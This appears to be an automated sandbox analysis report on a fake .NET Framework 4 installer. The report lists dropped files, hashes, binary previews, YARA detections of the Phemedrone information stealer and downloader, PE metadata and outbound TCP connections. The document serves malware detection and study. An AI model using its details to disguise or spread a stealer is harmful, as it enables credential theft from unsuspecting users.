                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                            Malicious:false
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\HFIAB70.tmp.html

                                                            Download File
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16118
                                                            Entropy (8bit):3.6434775915277604
                                                            Encrypted:false
                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                            C:\Users\user\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20231004_155755575.html

                                                            Download File
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (477), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65988
                                                            Entropy (8bit):3.708641155096535
                                                            Encrypted:false
                                                            SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHJFNtwcYWo7EhKAIfBUCX2aELAk4UGGGGfRjNDdDtfe:fdsOTLyUFJFEWUxFzvLrWcvAhTQM
                                                            MD5:8D0FB985255B649EBD547F425FECDF82
                                                            SHA1:5B739FCDBC35FB08AB17FA3E419B79FF273C3D65
                                                            SHA-256:EACA522183CFF07B9DD329D77CF17C997FD4E415B0EC42769D175FDE93B70079
                                                            SHA-512:F41118055E5254398BC24670A1E564F7FE39417910FE7029BB682456022E8091B6D129C3671AC1A1102B38E4393D0151167EB8FE8B1EC0FEC699EF9D242155F4
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                            C:\Users\user\AppData\Local\Temp\Setup_20231004_155752919.html

                                                            Download File
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):54216
                                                            Entropy (8bit):3.709625881353448
                                                            Encrypted:false
                                                            SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHJFNtwcYWo7EhKAIfBUCX2aELAk4UGGGGfRjNDdDtfD:fdsOTLyUFJFEWUxFzvLrWi
                                                            MD5:D58EBB822E9E0043F6836781009B9C3B
                                                            SHA1:C8BC428D855E4368046A1C950BE597875D7463F3
                                                            SHA-256:781BB976BA34F870741AC8359D4CBD4DF251F1923B7C7223CCF83A6EB012F379
                                                            SHA-512:F5D22DCECBC791E06E6EFF9D0ACAF1867C6593ABFFA728A326687EA2940C9740D373CCFB6CD8A5403C363EAFA394D3A7E6B20E08380F43D3B2B2B5A00D0127EF
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                            C:\Users\user\AppData\Local\Temp\TFRBBEE.tmp

                                                            Download File
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                            Category:modified
                                                            Size (bytes):708
                                                            Entropy (8bit):5.097676248548782
                                                            Encrypted:false
                                                            SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYn8lIz2:MNifQallTv3MswTbYZIz2
                                                            MD5:FF86F79D948C6F43BDE1852C1C66A829
                                                            SHA1:56A223843B07CE5077287CAED98F41ED904E53D6
                                                            SHA-256:FEB27E2D4F63A3ADB399D74E2A7199ABD5C9582AFC0618F968C260A913D6C885
                                                            SHA-512:FCD987163B6D7EC8873ECB95EE16C28EC0B524B5C5AE7D34F24DEC15727C80F3D0B11E8608AC3C2153D7DBE413CBD9EC0841F71BB6DDE64DD1C6904531E38CBD
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 has already been installed on this computer.\par..\pard\par..\par..\par..}...

                                                            C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):84992
                                                            Entropy (8bit):5.7667868438849075
                                                            Encrypted:false
                                                            SSDEEP:1536:+9EQCqXnMyJ5ePGTtS92QWKSO5T3rZSSwEKSKO9jzpmN:+9EkM+MPou2hS5TbZLwEKSKO9jV4
                                                            MD5:AE881BAA8C3A00A94E5994826BDAC3AA
                                                            SHA1:3F81A9E1CB712B2F69C8AB9104469A436C797706
                                                            SHA-256:2C669F5390B14C63C91F4898419792AAEE9C0B996DC348419E2EE84179CF3531
                                                            SHA-512:2E1845235D5CB2C710AB8DB068CC9CF744CCD2809E8293EF4CE27D090D071A645524D23517F74BF841ACA21DDEEA7DAA21621B537A63A7EC356DB7BE6DFC21FC
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.d.........."...0..B...........`... ........@.. ....................................@.................................|`..O.................................................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H...........|...........................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. 6.j. )UU.Z(.....{....o!...X )UU.Z(.....{....o"...X*..{%...*..{&...*V.(......}%.....}&...*. .V0; )UU.Z(.....{%...o!...X )UU.Z(.....{&...o"...X*..{'...*..{(...*V.(......}'.....}(...*. .1.. )UU.Z(.....{'...o!...X )UU.Z(.....{(...o"...X*..(....*.s.........*..o+...*..(...+*J...-...s4...s5...*..o6...*..o7

                                                            C:\Users\user\AppData\Local\Temp\dd_G5K9HNJ7_decompression_log.txt

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):5.272596676041869
                                                            Encrypted:false
                                                            SSDEEP:24:PFtMTxgB03zkjwbYztjyxvqSqv/oLK4Fq8vjHIWtC7TFjH62XUNRc0I1/:9tMNSwMzte8nvl4FIWQ69I
                                                            MD5:9E1463553A6AC05B3B12FE5DECFC641C
                                                            SHA1:4E0EEE9C1FCC6F838C9A9F7B75996FB98ADE7D83
                                                            SHA-256:0D4E6E856CC678C2647E786BC17185D5C9054B3B28CABE8CC627FA8C14597C29
                                                            SHA-512:760F2230981334804AE6E4889BB9DF4BEAB7CA3817C1FFC618EE8944F85091E16666EF508E08119FCE435C3BE2B990F5C081BEED9BC37CAB717A5FB871CCC8D2
                                                            Malicious:false
                                                            Preview:[10/4/2023, 15:57:50] === Logging started: 2023/10/04 15:57:50 ===..[10/4/2023, 15:57:50] Executable: C:\ProgramData\Start Menu\G5K9HNJ7.exe v4.0.30319.1..[10/4/2023, 15:57:50] --- logging level: standard ---..[10/4/2023, 15:57:50] Successfully bound to the ClusApi.dll..[10/4/2023, 15:57:50] Error 0x800706d9: Failed to open the current cluster..[10/4/2023, 15:57:50] Cluster drive map: ''..[10/4/2023, 15:57:50] Considering drive: 'C:\'.....[10/4/2023, 15:57:50] Considering drive: 'D:\'.....[10/4/2023, 15:57:50] Drive 'D:\' is rejected because of the unknown or unsuitable drive type..[10/4/2023, 15:57:50] Drive 'C:\' has been selected as the largest fixed drive..[10/4/2023, 15:57:50] Directory 'C:\6c8944922f7b98d0b6cd82b768\' has been selected for file extraction..[10/4/2023, 15:57:50] Extracting files to: C:\6c8944922f7b98d0b6cd82b768\..[10/4/2023, 15:57:52] Extraction took 1.610 seconds..[10/4/2023, 15:57:52] Executing command line: 'C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64

                                                            C:\Users\user\AppData\Local\Temp\mso5B88.tmp

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:GIF image data, version 89a, 15 x 15
                                                            Category:dropped
                                                            Size (bytes):663
                                                            Entropy (8bit):5.949125862393289
                                                            Encrypted:false
                                                            SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                            MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                            SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                            SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                            SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                            Malicious:false
                                                            Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                            C:\Users\user\AppData\Local\Temp\~$ockersInfo1.rtf

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):4.076008494109653
                                                            Encrypted:false
                                                            SSDEEP:3:iYL23KpRMKLXZ/zxs5JMUmov5seLWWklwWlY1MaaRckN:niKRMKzZmhrqQ1bJE
                                                            MD5:E6A616752683C8C4BD774B8B6B8F404D
                                                            SHA1:3D0F20BAF87F11AC406AA31B305E8D52F033C7FF
                                                            SHA-256:EF7E0D276A429A5ED7D54CFDD61B122D37F778518BDFE7D7120CFA4C2C785FF2
                                                            SHA-512:619A2A27A3EDC5D62D5C923C9CB1532FEB55B2D92737D27842D86CCB885E23FB79DF797253ED02C9A2DA1CAC6C77FEAE071F9B189BB4ED8DDD6D4433F573482C
                                                            Malicious:false
                                                            Preview:............................................................\par..}...nformation\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\........Wy%...O.}..i.....VO..=.h

                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):30
                                                            Entropy (8bit):1.2389205950315936
                                                            Encrypted:false
                                                            SSDEEP:3:T8u1:wu
                                                            MD5:0A4E28764876BF78EB12224249AE4012
                                                            SHA1:A1E754CE287CC02A4A121F94815934381F926678
                                                            SHA-256:FC68B1B8D79F38BEB741DF357B52BC67E0BD4FEA82131388DD20C661C44666D7
                                                            SHA-512:0D7BB555246B2886D870ACC31FD4F749A940A7B78CA8A0364ABE51A52D9392FC64166F167E13F90390770932BAF9F8E1622FD8ED7416942CE430342048545C18
                                                            Malicious:false
                                                            Preview:.....Y........................

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BSLCOUEZYU7E34OO51JH.temp

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):0.41381685030363374
                                                            Encrypted:false
                                                            SSDEEP:3:/l:
                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                            Malicious:false
                                                            Preview:............

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):0.41381685030363374
                                                            Encrypted:false
                                                            SSDEEP:3:/l:
                                                            MD5:E4A1661C2C886EBB688DEC494532431C
                                                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                            Malicious:false
                                                            Preview:............

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):3.964172235162529
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:dotNetFx40_Full_setup.exe
                                                            File size:2'605'056 bytes
                                                            MD5:5d4392b56aa4ebac400bbe86fe5d0767
                                                            SHA1:a68a6004e111ba899254aa015d93706037c447ff
                                                            SHA256:a604eed1325b12671370e268783cfa74f8675a468492ff98416187d73768b4af
                                                            SHA512:a2de9b684163bfad13aa23f76f32b4122ef8b9dd3a4ab557d1b395c13aafa62fd475a657cb4cc79183543a0ac2444dc457586ae17079764c27a5ffc94c8230f9
                                                            SSDEEP:49152:o3s23i7y2K9TYDnORn+JuXbOoGlQXlSHcBA5TkfZnIZirM5RxivYp:
                                                            TLSH:98C5F7203DFB101DB3B3AFA95FD8B8AE996FF773270A64A9106103464712D81DD92739
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i>............"...0...'...........'.. ....'...@.. ....................... (.......'...@................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x67d7ae
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x27d7580x53.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27e0000x248.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2800000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x27b7b40x27b800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x27e0000x2480x400False0.3056640625data3.526286411687027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x2800000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0x27e0580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 4, 2023 15:57:52.492597103 CEST4968380192.168.2.4208.95.112.1
                                                            Oct 4, 2023 15:57:52.641722918 CEST8049683208.95.112.1192.168.2.4
                                                            Oct 4, 2023 15:57:52.642724037 CEST4968380192.168.2.4208.95.112.1
                                                            Oct 4, 2023 15:57:52.643373966 CEST4968380192.168.2.4208.95.112.1
                                                            Oct 4, 2023 15:57:52.793297052 CEST8049683208.95.112.1192.168.2.4
                                                            Oct 4, 2023 15:57:52.847147942 CEST4968380192.168.2.4208.95.112.1
                                                            Oct 4, 2023 15:57:59.863097906 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.012963057 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.013042927 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.013323069 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.237432957 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.237932920 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.239152908 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.391165972 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.391180992 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.391195059 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.391238928 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.391271114 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.391271114 CEST4968780192.168.2.4104.21.88.34
